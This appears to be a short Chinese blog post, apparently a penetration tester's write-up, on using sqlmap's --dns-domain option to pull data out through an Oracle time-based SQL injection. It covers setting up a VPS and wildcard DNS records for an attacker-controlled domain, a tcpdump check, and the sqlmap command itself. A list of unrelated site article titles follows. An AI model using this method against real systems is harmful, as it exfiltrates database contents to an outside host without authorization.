0x01 起因

实际项目中遇到一个oracle延时注入，需要获取数据，几十个库几百张表，等找到关键数据不知道要到哪天.

测试支持带外请求

于是想用使用sqlmap利用DNS进行OOB注入

0x02 阿里云主机与DNS解析配置

1.首先购买一个域名并且进行备案，然后还需要一台vps

2.配置DNS解析

创建DNS服务器ns1.cwkiller.top-->vps ip ns2.cwkiller.top-->vps ip

修改DNS为ns1.cwkiller.top ns2.cwkiller.top

解析域名

添加ns1、ns2、*三个主机记录记录值为vps ip

等待状态正常和显示这个

在本机ping ceshi.cwkiller.top vps执行 tcpdump -n port 53 收到请求说明配置正确

0x03 使用sqlmap --dns-domain快速注入

使用以下命令获取表名

python sqlmap.py -r 2.txt --dbms=oracle --dns-domain=cwkiller.top -D app --columns --batch

选中部分代表DNS通道建立成功，可以看到一秒钟能跑多条数据.

最新文章

1. 2016年11月6日--form表单验证和事件、正则表达式
2. pylab模式
3. 在sqlserver存储过程中给in参数传带逗号值的办法，如传'1','2','3'这样的
4. 说说ID选择符、类选择符和HTML标记选择符的优先级顺序
5. 通过StoryBoard加载视图控制器问题
6. solaris下的常用命令
7. Flex 播放视频
8. 算法导论练习6.5-8 k路合并
9. Qt5 FOR WINCE7, Visual Studio 2008环境的搭建
10. [bzoj2286] [Sdoi2011消耗战
11. yarn 淘宝源安装与使用用法
12. Python shuffle() 函数
13. CLOUD计算产品成本嵌套
14. 问题集录--TensorFlow深度学习
15. vue-tree
16. 【JavaScript】满天星
17. poj1002 字典树+map+查询单词出现次数
18. 学习CSS
19. 2018.5.27 OraclePLSQL编程 if-else练习和循环结构练习
20. FZU 2057 家谱（dfs）

热门文章

1. HTTP 请求状态码
2. Spring Boot 整合视图层技术，application全局配置文件
3. 51单片机内存条（64K）
4. STS——BootDash的报错及解决
5. CF632(div.2)C. Eugene and an array
6. 课程登记窗口java
7. Ubuntu 安装配置Dosbox
8. Oacle学习-01Oracle的安装
9. openpyxl 模块 读写Excel
10. Java序列化机制中的类版本问题 serialVersionUID的静态字段 含义